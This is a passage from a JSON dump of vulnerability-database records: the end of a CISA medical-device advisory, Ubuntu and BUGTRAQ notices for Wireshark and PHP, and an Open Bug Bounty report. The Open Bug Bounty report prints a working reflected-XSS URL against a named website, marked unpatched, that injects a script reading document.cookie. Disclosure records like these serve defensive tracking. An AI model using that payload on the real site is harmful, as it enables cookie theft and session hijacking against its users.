security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSMA-19-120-01>); we'd welcome your feedback.\n", "published": "2019-11-07T00:00:00", "modified": "2019-11-07T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, "href": "https://www.us-cert.gov/ics/advisories/ICSMA-19-120-01", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSMA-19-120-01", "https://cwe.mitre.org/data/definitions/79.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6562", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "https://cwe.mitre.org/data/definitions/200.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13557", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "https://www.fda.gov/MedicalDevices/DigitalHealth/ucm373213.htm", "https://www.us-cert.gov/ics/recommended-practices", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.dhs.gov/privacy-policy", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSMA-19-120-01", "http://twitter.com/icscert", "https://www.dhs.gov", "https://www.dhs.gov/freedom-information-act-foia", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plain-writing-dhs", "https://www.dhs.gov/plug-information", "https://www.oig.dhs.gov/", "https://www.whitehouse.gov/", "https://www.usa.gov/", "https://www.dhs.gov/"], "cvelist": ["CVE-2019-13557", "CVE-2019-6562"], "immutableFields": [], "lastseen": "2021-07-28T18:28:57", "history": [], "viewCount": 56, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-6562", "CVE-2019-13557"]}, {"type": "symantec", "idList": ["SMNTC-108120", "SMNTC-110814"]}, {"type": "ics", "idList": ["ICSA-10-097-01", "ICSA-19-318-04", "ICSA-21-063-01", "ICSA-21-133-01", "ICSA-20-280-01", "ICSA-11-110-01", "ICSA-10-090-01", "ICSA-21-180-05", "ICSA-21-147-03", "ICSA-19-337-01", "ICSA-11-017-01", "ICSMA-19-311-02", "ICSA-10-070-01A", "ICSMA-19-274-01", "ICSA-21-161-02", "ICSA2012601", "ICSA-21-194-04", "ICSA-11-132-01A", "ICSA-21-054-04", "ICSA-19-330-01", "ICSA-15-225-01", "ICSA-20-287-04", "ICSA-19-351-01", "ICSA-21-161-01", "ICSA-13-024-01", "ICSA-19-318-03", "ICSA-19-318-05", "ICSMA-18-058-01", "ICSA-12-167-01", "ICSA-20-051-04", "ICSA-19-346-01", "ICSMA-20-023-01", "ICSA-21-056-01", "ICSA-11-122-01", "ICSA-19-346-02", "ICSA-19-339-01", "ICSA-20-177-02", "ICSA-11-223-01A", "ICSA-10-228-01", "ICSMA-21-175-01", "ICSA-11-069-01B", "ICSA-19-344-05", "ICSA-21-166-02", "ICSA-19-353-02", "ICSA-21-166-01", "ICSA-21-208-04", "ICSA-21-208-02", "ICSA-19-344-03", "ICSA-10-337-01", "ICSMA-21-196-01", "ICSMA-18-088-01", "ICSA-313-01", "ICSA-11-119-01", "ICSA-20-042-12", "ICSMA-19-353-01", "ICSA-21-194-14", "ICSA-20-042-03", "ICSA-10-322-02A", "ICSA-19-339-02", "ICSA-13-291-01B", "ICSA-20-238-02", "ICSA-11-018-02", "ICSA-20-035-01", "ICSA-10-264-01", "ICSA-11-084-01", "ICSA-11-147-01B", "ICSA-11-231-01", "ICSA2012602", "ICSA-20-021-01", "ICSA-21-005-03", "ICSA-20-042-13", "ICSA-13-289-01", "ICSA-20-042-09", "ICSA-11-103-01A", "ICSA-21-187-01", "ICSA-20-014-03", "ICSA-10-070-02", "ICSA-11-175-01", "ICSA-10-322-01", "ICSA-17-192-05", "ICSA-20-014-01", "ICSA-19-337-02", "ICSMA-16-196-01", "ICSA-11-147-02", "ICSA-19-346-03", "ICSA-21-182-04", "ICSA-20-140-02", "ICSA-19-290-01", "ICSA-12-039-01", "ICSA-11-175-02", "ICSA-20-049-02", "ICSA-11-025-01", "ICSMA-16-089-01", "ICSA-18-163-02", "ICSMA-19-311-01", "ICSA-11-018-01", "ICSA-19-344-07", "ICSA-11-041-01A", "ICSA-21-194-10", "ICSA-21-180-06"]}], "modified": "2021-07-28T18:28:57", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-07-28T18:28:57", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-07-28T18:28:57", "differentElements": ["cvss3"], "edition": 5}], "viewCount": 57, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-6562", "CVE-2019-13557"]}, {"type": "symantec", "idList": ["SMNTC-110814", "SMNTC-108120"]}, {"type": "ics", "idList": ["ICSA-19-094-03", "ICSA-18-284-03", "ICSA-15-153-02", "ICSA-18-030-02", "ICSA-17-129-03", "ICSA-21-194-10", "ICSA-18-200-04", "ICSA-18-333-02", "ICSA-19-036-02", "ICSA-21-257-19", "ICSA-21-040-02", "ICSA-21-217-04", "ICSA-16-105-02", "ICSA-17-208-04", "ICSA-16-287-05", "ICSA-21-257-21", "ICSA-18-158-01", "ICSA-17-103-01", "ICSA-21-182-03", "ICSA-21-245-02", "ICSA-13-184-02", "ICSA-21-194-04", "ICSA-13-045-01", "ICSA-18-032-03", "ICSA-15-076-02", "ICSA-21-257-14", "ICSA-15-153-01", "ICSA-12-228-01A", "ICSA-18-025-01", "ICSA-19-029-01", "ICSA-20-343-09", "ICSA-18-130-01", "ICSA-17-180-03", "ICSA-18-331-01", "ICSA-21-208-02", "ICSA-15-356-01", "ICSA-18-263-02", "ICSA-20-294-01", "ICSA-16-334-02", "ICSMA-21-012-01", "ICSA-19-162-03", "ICSA-20-315-04", "ICSA2012601", "ICSA-19-022-01", "ICSA-20-343-08", "ICSA-18-088-01", "ICSA-21-005-05", "ICSA-21-040-10", "ICSA-17-019-01A", "ICSA-21-159-06", "ICSMA-18-277-02", "ICSA-15-085-01A", "ICSA-20-329-02", "ICSA-14-098-02", "ICSA2012602", "ICSA-18-226-03", "ICSA-21-159-05", "ICSA-21-047-02", "ICSA-21-166-02", "ICSA-14-133-02", "ICSA-21-096-01", "ICSA-20-343-04", "ICSA-21-257-06", "ICSA-16-287-06", "ICSA-20-343-07", "ICSA-21-131-15", "ICSA-21-180-06", "ICSA-17-089-01", "ICSA-10-301-01A", "ICSA-21-257-09", "ICSA-21-229-01", "ICSA-18-317-01", "ICSA-17-341-02", "ICSA-18-282-05", "ICSA-12-138-01", "ICSA-18-100-02", "ICSA-15-328-01", "ICSA-21-236-03", "ICSA-313-01", "ICSA-21-033-01", "ICSA-17-164-03", "ICSA-11-110-01", "ICSA-21-145-01", "ICSA-18-191-03", "ICSA-18-212-02", "ICSA-21-257-13", "ICSA-21-257-12", "ICSA-14-058-01", "ICSA-13-067-02", "ICSA-20-252-02", "ICSA-18-282-01", "ICSA-21-238-04", "ICSA-20-105-06", "ICSA-21-110-03", "ICSA-17-150-01", "ICSA-18-172-01", "ICSA-21-028-01", "ICSA-19-036-01", "ICSA-21-238-03", "ICSA-20-014-05"]}], "modified": "2021-07-28T18:28:57", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-07-28T18:28:57", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.ics.ICSBulletin", "_object_types": ["robots.models.ics.ICSBulletin", "robots.models.base.Bulletin"]}], "openbugbounty": [{"type": "openbugbounty", "_object_type": "robots.models.openbugbounty.OpenbugbountyBulletin", "viewCount": 2, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2017-11-23T21:04:39", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-23T21:04:39", "rev": 2}}, "reporter": "0_1VitthalS", "title": "thepetitionsite.com XSS vulnerability ", "objectVersion": "1.4", "cvelist": [], "bulletinFamily": "bugbounty", "cvss": {"score": 0.0, "vector": "NONE"}, "references": [], "enchantments_done": [], "modified": "2017-11-23T08:36:00", "description": "##### Vulnerable URL:\n \n \n http://www.thepetitionsite.com/en-gb/how-to-write-a-petition//%22--!%3E%22%22%3E%3Ch1%3EChri55%3C/h1%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C/br%3E/\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| No \nLatest check for patch:| 23.11.2017 \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| 13557 \nVIP website status:| Yes \nCheck thepetitionsite.com SSL connection:| (Grade: A) \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 25 August, 2017 08:19 GMT \nGeneric security notifications sent to website owner| 25 August, 2017 08:22 GMT \nCustomized security notification sent to website owner| 25 August, 2017 08:22 GMT \nNotification sent to subscribers (without technical details)| 25 August, 2017 10:17 GMT \nVulnerability details disclosed by researcher| 23 November, 2017 08:36 GMT\n", "href": "https://www.openbugbounty.org/reports/282126/", "history": [{"edition": 1, "bulletin": {"reporter": "0_1VitthalS", "cvss": {"score": 0.0, "vector": "NONE"}, "references": [], "enchantments_done": [], "cvelist": [], "viewCount": 0, "modified": "2017-08-25T10:17:00", "description": "On the 25.08.2017 security researcher reported a XSS vulnerability affecting the thepetitionsite.com website via the Open Bug Bounty coordinated vulnerability disclosure program.\n\n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 25 August, 2017 08:19 GMT \nGeneric security notifications sent to website owner| 25 August, 2017 08:22 GMT \nCustomized security notification sent to website owner| 25 August, 2017 08:22 GMT \nNotification sent to subscribers (without technical details)| 25 August, 2017 10:17 GMT \n \nIf you are the website owner or administrator please [contact the researcher](<https://www.openbugbounty.org/researchers/0_1VitthalS/>) directly to get vulnerability details and proceed to coordinated disclosure.\n", "enchantments": {}, "href": "https://www.openbugbounty.org/reports/282126/", "history": [], "id": "OBB:282126", "type": "openbugbounty", "title": "thepetitionsite.com XSS vulnerability", "lastseen": "2017-10-16T20:57:05", "openbugbounty": {"patchStatus": "on hold", "mirror": ""}, "objectVersion": "1.4", "bulletinFamily": "bugbounty", "published": "2017-08-25T08:19:00"}, "lastseen": "2017-10-16T20:57:05", "differentElements": ["description", "modified", "openbugbounty", "title"]}], "id": "OBB:282126", "lastseen": "2017-11-23T21:04:39", "openbugbounty": {"patchStatus": "unpatched", "mirror": ""}, "_object_types": ["robots.models.openbugbounty.OpenbugbountyBulletin", "robots.models.base.Bulletin"], "published": "2017-08-25T08:19:00"}], "ubuntucve": [{"id": "UB:CVE-2017-7701", "hash": "0aa991ec898c43c8d0567ea6c6b0020a", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2017-7701", "description": "In Wireshark 2.2.0 to 2.2.5 and 2.0.0 to 2.0.11, the BGP dissector could go\ninto an infinite loop, triggered by packet injection or a malformed capture\nfile. This was addressed in epan/dissectors/packet-bgp.c by using a\ndifferent integer data type.", "published": "2017-04-12T00:00:00", "modified": "2017-04-12T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://ubuntu.com/security/CVE-2017-7701", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7701", "https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13557", "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=fa31f69b407436d0946f84baa0acdcc50962bf7a", "https://www.wireshark.org/security/wnpa-sec-2017-16.html", "https://nvd.nist.gov/vuln/detail/CVE-2017-7701", "https://launchpad.net/bugs/cve/CVE-2017-7701", "https://security-tracker.debian.org/tracker/CVE-2017-7701"], "cvelist": ["CVE-2017-7701"], "immutableFields": [], "lastseen": "2021-07-31T00:01:20", "history": [{"bulletin": {"id": "UB:CVE-2017-7701", "hash": "c61670b1d5d147adc1126aa58fe8b01d", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2017-7701", "description": "In Wireshark 2.2.0 to 2.2.5 and 2.0.0 to 2.0.11, the BGP dissector could go\ninto an infinite loop, triggered by packet injection or a malformed capture\nfile. This was addressed in epan/dissectors/packet-bgp.c by using a\ndifferent integer data type.", "published": "2017-04-12T00:00:00", "modified": "2017-04-12T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2017-7701", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7701", "https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13557", "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=fa31f69b407436d0946f84baa0acdcc50962bf7a", "https://www.wireshark.org/security/wnpa-sec-2017-16.html", "https://nvd.nist.gov/vuln/detail/CVE-2017-7701", "https://launchpad.net/bugs/cve/CVE-2017-7701", "https://security-tracker.debian.org/tracker/CVE-2017-7701"], "cvelist": ["CVE-2017-7701"], "immutableFields": [], "lastseen": "2021-06-30T22:49:29", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "redhatcve", "idList": ["RH:CVE-2017-7701"]}, {"type": "cve", "idList": ["CVE-2017-7701"]}, {"type": "kaspersky", "idList": ["KLA11020"]}, {"type": "gentoo", "idList": ["GLSA-201706-12"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201706-12.NASL", "WIRESHARK_2_2_6.NASL", "SUSE_SU-2017-1442-1.NASL", "OPENSUSE-2017-503.NASL", "SUSE_SU-2017-1174-1.NASL", "MACOSX_WIRESHARK_2_2_6.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811001", "OPENVAS:1361412562310811002"]}], "modified": "2021-06-30T22:49:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-06-30T22:49:29", "rev": 2}}, "objectVersion": "1.5", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "2.2.6, 2.0.12", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "wireshark"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "2.6.3-1~ubuntu18.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "wireshark"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "2.6.3-1~ubuntu16.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "wireshark"}, {"OS": "ubuntu", "OSVersion": "14.04", "arch": "noarch", "packageVersion": "2.6.3-1~ubuntu14.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "wireshark"}], "bugs": []}, "lastseen": "2021-06-30T22:49:29", "differentElements": ["cvss2", "cvss3"], "edition": 1}], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-7701"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-7701"]}, {"type": "kaspersky", "idList": ["KLA11020"]}, {"type": "gentoo", "idList": ["GLSA-201706-12"]}, {"type": "nessus", "idList": ["OPENSUSE-2017-503.NASL", "WIRESHARK_2_2_6.NASL", "MACOSX_WIRESHARK_2_2_6.NASL", "SUSE_SU-2017-1442-1.NASL", "GENTOO_GLSA-201706-12.NASL", "SUSE_SU-2017-1174-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811001", "OPENVAS:1361412562310811002"]}], "modified": "2021-07-31T00:01:20", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-07-31T00:01:20", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "2.2.6, 2.0.12", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "wireshark"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "2.6.3-1~ubuntu18.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "wireshark"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "2.6.3-1~ubuntu16.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "wireshark"}, {"OS": "ubuntu", "OSVersion": "14.04", "arch": "noarch", "packageVersion": "2.6.3-1~ubuntu14.04.1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "wireshark"}], "bugs": [], "_object_type": "robots.models.ubuntucve.UbuntuCVEBulletin", "_object_types": ["robots.models.ubuntucve.UbuntuCVEBulletin", "robots.models.base.Bulletin"]}], "securityvulns": [{"id": "SECURITYVULNS:VULN:14753", "bulletinFamily": "software", "title": "PHP security vulnerabilities", "description": "PHAR extension DoS.", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32651"], "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "type": "securityvulns", "lastseen": "2021-06-08T19:08:49", "history": [{"bulletin": {"affectedSoftware": [{"name": "PHP", "operator": "eq", "version": "5.6"}], "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "PHAR extension DoS.", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-08-31T11:10:03", "references": [{"idList": ["ALAS-2015-602", "ALAS-2015-601"], "type": "amazon"}, {"idList": ["CVE-2015-7803", "CVE-2015-7804"], "type": "cve"}, {"idList": ["H1:103990", "H1:104008"], "type": "hackerone"}, {"idList": ["SECURITYVULNS:DOC:32651"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310806649", "OPENVAS:1361412562310806648", "OPENVAS:703380", "OPENVAS:1361412562310120520", "OPENVAS:1361412562310842508", "OPENVAS:1361412562310807000", "OPENVAS:1361412562311220201747", "OPENVAS:1361412562310703380", "OPENVAS:1361412562310120396", "OPENVAS:1361412562311220191984"], "type": "openvas"}, {"idList": ["RHSA-2016:0457"], "type": "redhat"}, {"idList": ["SUSE-SU-2016:1145-1", "SUSE-SU-2016:1638-1", "SUSE-SU-2016:1581-1"], "type": "suse"}, {"idList": ["DEBIAN:DSA-3380-1:F94D6", "DEBIAN:DLA-341-1:DA682"], "type": "debian"}, {"idList": ["USN-2786-1"], "type": "ubuntu"}, {"idList": ["SSA-2016-034-04"], "type": "slackware"}, {"idList": ["GLSA-201606-10"], "type": "gentoo"}, {"idList": ["ALA_ALAS-2015-602.NASL", "FREEBSD_PKG_C1DA8B756AEF11E59909002590263BF5.NASL", "UBUNTU_USN-2786-1.NASL", "PHP_5_6_14.NASL", "SUSE_SU-2016-0284-1.NASL", "PHP_5_5_30.NASL", "SLACKWARE_SSA_2016-034-04.NASL", "OPENSUSE-2016-100.NASL", "ALA_ALAS-2015-601.NASL", "DEBIAN_DSA-3380.NASL"], "type": "nessus"}, {"idList": ["C1DA8B75-6AEF-11E5-9909-002590263BF5"], "type": "freebsd"}, {"idList": ["F5:K17503", "SOL17503"], "type": "f5"}, {"idList": ["CLSA-2020:1605798462"], "type": "cloudlinux"}], "rev": 2}, "score": {"modified": "2018-08-31T11:10:03", "rev": 2, "value": 7.4, "vector": "NONE"}}, "hash": "5bebcb6b83df2b42d069178c1e9ea73c038f8703bc95cf2b81c683a8d0d17ff6", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "94aee96d0a33ff770af1ab8e308073f0", "key": "cvelist"}, {"hash": "c514412540c1e967450f03283e4ed180", "key": "references"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "5c799165d68e636bd0726587ae899c0d", "key": "description"}, {"hash": "6d2dcaed858380d54d5782ad38c55586", "key": "affectedSoftware"}, {"hash": "2c5cca82a8670da097919f6160833daf", "key": "reporter"}, {"hash": "b3b8db0e3c7acd6c3190db6f8e88e96b", "key": "href"}, {"hash": "d8f38bedae5c73d95ff296ba2bd86a44", "key": "modified"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "3a18a828bc11b79a70839be146b3b5a3", "key": "title"}, {"hash": "d54751dd75af2ea0147b462b3e001cd0", "key": "type"}, {"hash": "d8f38bedae5c73d95ff296ba2bd86a44", "key": "published"}], "history": [], "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "id": "SECURITYVULNS:VULN:14753", "immutableFields": [], "lastseen": "2018-08-31T11:10:03", "modified": "2015-11-02T00:00:00", "objectVersion": "1.5", "published": "2015-11-02T00:00:00", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32651"], "reporter": "BUGTRAQ", "title": "PHP security vulnerabilities", "type": "securityvulns", "viewCount": 212}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-08-31T11:10:03"}], "edition": 2, "hashmap": [{"key": "affectedSoftware", "hash": "1858c8bfb7eb8aace48fa57059397c29"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "94aee96d0a33ff770af1ab8e308073f0"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "5c799165d68e636bd0726587ae899c0d"}, {"key": "href", "hash": "b3b8db0e3c7acd6c3190db6f8e88e96b"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "c514412540c1e967450f03283e4ed180"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "3a18a828bc11b79a70839be146b3b5a3"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "8859a40c26baff900b73dab92cbb6fd72e9b8dcbbd9acc6d613b18d55563796e", "viewCount": 222, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["F5:K17503", "SOL17503"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-7803", "UB:CVE-2015-7804"]}, {"type": "cve", "idList": ["CVE-2015-7803", "CVE-2015-7804"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191984", "OPENVAS:1361412562311220201747", "OPENVAS:1361412562310806649", "OPENVAS:1361412562310120520", "OPENVAS:1361412562311220192438", "OPENVAS:1361412562310703380", "OPENVAS:703380", "OPENVAS:1361412562311220192649", "OPENVAS:1361412562310807000", "OPENVAS:1361412562310806648", "OPENVAS:1361412562310120396", "OPENVAS:1361412562310842508"]}, {"type": "nessus", "idList": ["ALA_ALAS-2015-602.NASL", "DEBIAN_DSA-3380.NASL", "EULEROS_SA-2019-2649.NASL", "PHP_5_5_30.NASL", "UBUNTU_USN-2786-1.NASL", "OPENSUSE-2016-100.NASL", "SUSE_SU-2016-1581-1.NASL", "FREEBSD_PKG_C1DA8B756AEF11E59909002590263BF5.NASL", "OPENSUSE-2016-157.NASL", "EULEROS_SA-2019-1984.NASL", "MACOSX_SECUPD2015-008.NASL", "9325.PRM", "SLACKWARE_SSA_2016-034-04.NASL", "EULEROS_SA-2019-2438.NASL", "SUSE_SU-2016-1638-1.NASL", "WEB_APPLICATION_SCANNING_98806", "GENTOO_GLSA-201606-10.NASL", "8956.PRM", "SUSE_SU-2016-0284-1.NASL", "MACOSX_10_11_2.NASL", "SUSE_SU-2016-1145-1.NASL", "PHP_5_6_14.NASL", "DEBIAN_DLA-341.NASL", "ALA_ALAS-2015-601.NASL", "PFSENSE_SA-15_08.NASL", "EULEROS_SA-2020-1747.NASL"]}, {"type": "freebsd", "idList": ["C1DA8B75-6AEF-11E5-9909-002590263BF5"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32651"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3380-1:F94D6", "DEBIAN:DLA-341-1:DA682"]}, {"type": "ubuntu", "idList": ["USN-2786-1"]}, {"type": "slackware", "idList": ["SSA-2016-034-04"]}, {"type": "hackerone", "idList": ["H1:104008", "H1:103990"]}, {"type": "amazon", "idList": ["ALAS-2015-602", "ALAS-2015-601"]}, {"type": "redhat", "idList": ["RHSA-2016:0457"]}, {"type": "suse", "idList": ["SUSE-SU-2016:1581-1", "SUSE-SU-2016:1145-1", "SUSE-SU-2016:1638-1"]}, {"type": "gentoo", "idList": ["GLSA-201606-10"]}, {"type": "cloudlinux", "idList": ["CLSA-2020:1605798462"]}], "modified": "2021-06-08T19:08:49", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-06-08T19:08:49", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "php", "operator": "eq", "version": "5.6"}], "immutableFields": [], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32651", "bulletinFamily": "software", "title": "[USN-2786-1] PHP vulnerabilities", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 